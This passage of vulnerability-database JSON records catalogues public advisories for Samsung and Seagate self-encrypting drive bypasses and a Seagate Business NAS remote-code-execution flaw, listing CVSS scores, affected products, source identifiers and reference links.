"vectorString": "CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-7268",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2015-7268",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2017-38306",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201711-1081",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-85229",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38306"
},
{
"db": "VULHUB",
"id": "VHN-85229"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008067"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1081"
},
{
"db": "NVD",
"id": "CVE-2015-7268"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samsung 850 Pro and PM851 solid-state drives and Seagate ST500LT015 and ST500LT025 hard disk drives, when used on Windows and operating in Opal mode on Lenovo ThinkPad T440s laptops with BIOS 2.32 or ThinkPad W541 laptops with BIOS 2.21, or in Opal or eDrive mode on Dell Latitude E6410 laptops with BIOS A16 or Latitude E6430 laptops with BIOS A16, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by triggering a soft reset and booting from an alternative OS, aka a \"Forced Restart Attack.\". Samsung 850 Pro/PM851 Solid state drives and Seagate ST500LT015/ST500LT025 There are vulnerabilities in hard disk drives that can bypass security functions.Information may be obtained. LenovoThinkPadT440slaptop is a laptop from Lenovo China. The DellLatitudeE6410laptop is a laptop from Dell. Samsung850Pro, etc. are all hard drives used in laptops. The Samsung850Pro is a hard disk manufactured by Samsung in South Korea. The Seagate ST500LT015 is a hard drive manufactured by Seagate. There are security holes in the Samsung850Pro, PM851 SSD, SeagateST500LT015 and ST500LT025 hard drives on several devices. An attacker with a physical location approach can exploit the vulnerability to bypass self-encrypting hard disk protection by implementing a forced restart attack. Samsung/Seagate Self-Encrypting Drives Protection are prone to a local security-bypass vulnerability. This may aid in further attacks. \nThe following products are vulnerable:\nSeagate ST500LT015 and ST500LT025\nSamsung 850 Pro and PM851. Samsung 850 Pro etc. The following products are affected: Lenovo ThinkPad T440s laptop using BIOS version 2.32; ThinkPad W541 laptop using BIOS version 2.21; Dell Latitude E6410 laptop using BIOS version A16; Latitude E6430 laptop using BIOS version A16",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-7268"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008067"
},
{
"db": "CNVD",
"id": "CNVD-2017-38306"
},
{
"db": "BID",
"id": "102334"
},
{
"db": "VULHUB",
"id": "VHN-85229"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-7268",
"trust": 3.4
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008067",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1081",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-38306",
"trust": 0.6
},
{
"db": "BID",
"id": "102334",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-85229",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38306"
},
{
"db": "VULHUB",
"id": "VHN-85229"
},
{
"db": "BID",
"id": "102334"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008067"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1081"
},
{
"db": "NVD",
"id": "CVE-2015-7268"
}
]
},
"id": "VAR-201711-0010",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38306"
},
{
"db": "VULHUB",
"id": "VHN-85229"
}
],
"trust": 1.4942857200000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38306"
}
]
},
"last_update_date": "2025-04-20T23:25:55.683000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Samsung 850 Pro",
"trust": 0.8,
"url": "http://www.samsung.com/semiconductor/minisite/jp/ssd/consumer/850pro/"
},
{
"title": "Samsung PM851 Solid State Drive",
"trust": 0.8,
"url": "https://www.samsung.com/us/business/oem-solutions/pdfs/PM851-SSD-ProdOverview.pdf"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.seagate.com/jp/ja/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008067"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-254",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-85229"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008067"
},
{
"db": "NVD",
"id": "CVE-2015-7268"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.4,
"url": "https://www.blackhat.com/docs/eu-15/materials/eu-15-boteanu-bypassing-self-encrypting-drives-sed-in-enterprise-environments-wp.pdf"
},
{
"trust": 2.0,
"url": "https://www.infoworld.com/article/3004913/encryption/self-encrypting-drives-are-hardly-any-better-than-software-based-encryption.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7268"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7268"
},
{
"trust": 0.3,
"url": "www.samsung.com"
},
{
"trust": 0.3,
"url": "https://www.seagate.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38306"
},
{
"db": "VULHUB",
"id": "VHN-85229"
},
{
"db": "BID",
"id": "102334"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008067"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1081"
},
{
"db": "NVD",
"id": "CVE-2015-7268"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-38306"
},
{
"db": "VULHUB",
"id": "VHN-85229"
},
{
"db": "BID",
"id": "102334"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008067"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1081"
},
{
"db": "NVD",
"id": "CVE-2015-7268"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38306"
},
{
"date": "2017-11-27T00:00:00",
"db": "VULHUB",
"id": "VHN-85229"
},
{
"date": "2017-11-27T00:00:00",
"db": "BID",
"id": "102334"
},
{
"date": "2018-01-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-008067"
},
{
"date": "2017-11-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201711-1081"
},
{
"date": "2017-11-27T22:29:00.287000",
"db": "NVD",
"id": "CVE-2015-7268"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-38306"
},
{
"date": "2017-12-20T00:00:00",
"db": "VULHUB",
"id": "VHN-85229"
},
{
"date": "2017-11-27T00:00:00",
"db": "BID",
"id": "102334"
},
{
"date": "2018-01-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-008067"
},
{
"date": "2017-11-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201711-1081"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2015-7268"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "102334"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1081"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samsung 850 Pro/PM851 of SSD and Seagate ST500LT015/ST500LT025 of HDD Vulnerabilities that bypass security functions",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008067"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201711-1081"
}
],
"trust": 0.6
}
}
VAR-201706-0189
Vulnerability from variot - Updated: 2025-04-20 23:24Seagate Business NAS devices with firmware before 2015.00322 allow remote attackers to execute arbitrary code with root privileges by leveraging use of a static encryption key to create session tokens. Seagate Business Storage 2-Bay NAS is prone to a remote-code-execution vulnerability. Failed exploit attempts will cause a denial-of-service condition
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201706-0189",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "business nas",
"scope": "eq",
"trust": 1.6,
"vendor": "seagate",
"version": "2014.00319"
},
{
"model": "business nas",
"scope": "lt",
"trust": 0.8,
"vendor": "seagate",
"version": "2015.00322"
},
{
"model": "business storage 2-bay nas",
"scope": "eq",
"trust": 0.3,
"vendor": "seagate",
"version": "2014.00319"
},
{
"model": "business storage 2-bay nas",
"scope": "eq",
"trust": 0.3,
"vendor": "seagate",
"version": "2013.60311"
}
],
"sources": [
{
"db": "BID",
"id": "72831"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008320"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-218"
},
{
"db": "NVD",
"id": "CVE-2014-8687"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:seagate:business_nas_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008320"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OJ Reeves",
"sources": [
{
"db": "BID",
"id": "72831"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-218"
}
],
"trust": 0.9
},
"cve": "CVE-2014-8687",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2014-8687",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-76632",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2014-8687",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-8687",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2014-8687",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201503-218",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-76632",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2014-8687",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76632"
},
{
"db": "VULMON",
"id": "CVE-2014-8687"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008320"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-218"
},
{
"db": "NVD",
"id": "CVE-2014-8687"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate Business NAS devices with firmware before 2015.00322 allow remote attackers to execute arbitrary code with root privileges by leveraging use of a static encryption key to create session tokens. Seagate Business Storage 2-Bay NAS is prone to a remote-code-execution vulnerability. Failed exploit attempts will cause a denial-of-service condition",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8687"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008320"
},
{
"db": "BID",
"id": "72831"
},
{
"db": "VULHUB",
"id": "VHN-76632"
},
{
"db": "VULMON",
"id": "CVE-2014-8687"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=36202",
"trust": 0.2,
"type": "exploit"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-76632",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76632"
},
{
"db": "VULMON",
"id": "CVE-2014-8687"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8687",
"trust": 2.9
},
{
"db": "PACKETSTORM",
"id": "130585",
"trust": 2.6
},
{
"db": "BID",
"id": "72831",
"trust": 2.1
},
{
"db": "PACKETSTORM",
"id": "130609",
"trust": 1.8
},
{
"db": "EXPLOIT-DB",
"id": "36264",
"trust": 1.8
},
{
"db": "EXPLOIT-DB",
"id": "36202",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008320",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201503-218",
"trust": 0.7
},
{
"db": "SEEBUG",
"id": "SSVID-89325",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-89319",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-76632",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2014-8687",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76632"
},
{
"db": "VULMON",
"id": "CVE-2014-8687"
},
{
"db": "BID",
"id": "72831"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008320"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-218"
},
{
"db": "NVD",
"id": "CVE-2014-8687"
}
]
},
"id": "VAR-201706-0189",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-76632"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-20T23:24:54.175000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.seagate.com/"
},
{
"title": "sbar",
"trust": 0.1,
"url": "https://github.com/dino213dz/sbar "
},
{
"title": "The Register",
"trust": 0.1,
"url": "https://www.theregister.co.uk/2015/03/10/seagate_that_remote_0day_aint_so_bad_well_patch_it_in_two_months/"
},
{
"title": "The Register",
"trust": 0.1,
"url": "https://www.theregister.co.uk/2015/03/02/seagate_nas_owner_hide_it_behind_a_firewall/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-8687"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008320"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-327",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76632"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008320"
},
{
"db": "NVD",
"id": "CVE-2014-8687"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://packetstormsecurity.com/files/130585/seagate-business-nas-2014.00319-remote-code-execution.html"
},
{
"trust": 1.9,
"url": "http://www.securityfocus.com/bid/72831"
},
{
"trust": 1.9,
"url": "https://www.exploit-db.com/exploits/36202/"
},
{
"trust": 1.8,
"url": "https://www.exploit-db.com/exploits/36264/"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/130609/seagate-business-nas-unauthenticated-remote-command-execution.html"
},
{
"trust": 1.8,
"url": "https://beyondbinary.io/articles/seagate-nas-rce/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8687"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-8687"
},
{
"trust": 0.3,
"url": "https://beyondbinary.io/advisory/seagate-nas-rce/"
},
{
"trust": 0.3,
"url": "http://www.seagate.com/gb/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/"
},
{
"trust": 0.3,
"url": "http://www.seagate.com/gb/en/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/327.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/dino213dz/sbar"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76632"
},
{
"db": "VULMON",
"id": "CVE-2014-8687"
},
{
"db": "BID",
"id": "72831"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008320"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-218"
},
{
"db": "NVD",
"id": "CVE-2014-8687"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-76632"
},
{
"db": "VULMON",
"id": "CVE-2014-8687"
},
{
"db": "BID",
"id": "72831"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008320"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-218"
},
{
"db": "NVD",
"id": "CVE-2014-8687"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-08T00:00:00",
"db": "VULHUB",
"id": "VHN-76632"
},
{
"date": "2017-06-08T00:00:00",
"db": "VULMON",
"id": "CVE-2014-8687"
},
{
"date": "2015-03-01T00:00:00",
"db": "BID",
"id": "72831"
},
{
"date": "2017-07-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008320"
},
{
"date": "2015-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201503-218"
},
{
"date": "2017-06-08T16:29:00.247000",
"db": "NVD",
"id": "CVE-2014-8687"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-16T00:00:00",
"db": "VULHUB",
"id": "VHN-76632"
},
{
"date": "2017-06-16T00:00:00",
"db": "VULMON",
"id": "CVE-2014-8687"
},
{
"date": "2015-03-01T00:00:00",
"db": "BID",
"id": "72831"
},
{
"date": "2017-07-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008320"
},
{
"date": "2017-06-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201503-218"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2014-8687"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201503-218"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate Business NAS Vulnerability to execute arbitrary code in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008320"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201503-218"
}
],
"trust": 0.6
}
}
VAR-201711-0011
Vulnerability from variot - Updated: 2025-04-20 23:24Seagate ST500LT015 hard disk drives, when operating in eDrive mode on Lenovo ThinkPad W541 laptops with BIOS 2.21, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by attaching a second SATA connector to exposed pins, maintaining an alternate power source, and attaching the data cable to another machine, aka a "Hot Unplug Attack.". Seagate ST500LT015 Vulnerabilities exist in the hard disk drives that bypass security features.Information may be obtained. LenovoThinkPadW541laptopswithBIOS2.21 is a notebook computer of China Lenovo (Lenovo) that uses BIOS 2.21 version. SeagateST500LT015harddiskdrive is a hard drive made by Seagate, a computer used in the United States. There is a security hole in the SeagateST500LT015harddiskdrive on the Lenovo ThinkPad W541 laptop with BIOS version 2.21. This may aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201711-0011",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "st500lt015",
"scope": "eq",
"trust": 1.6,
"vendor": "seagate",
"version": null
},
{
"model": "st500lt015",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "st500lt015",
"scope": null,
"trust": 0.6,
"vendor": "lenovo",
"version": null
},
{
"model": "st500lt015",
"scope": "eq",
"trust": 0.3,
"vendor": "seagate",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38307"
},
{
"db": "BID",
"id": "102266"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008066"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1080"
},
{
"db": "NVD",
"id": "CVE-2015-7269"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:seagate:st500lt015_firmware",
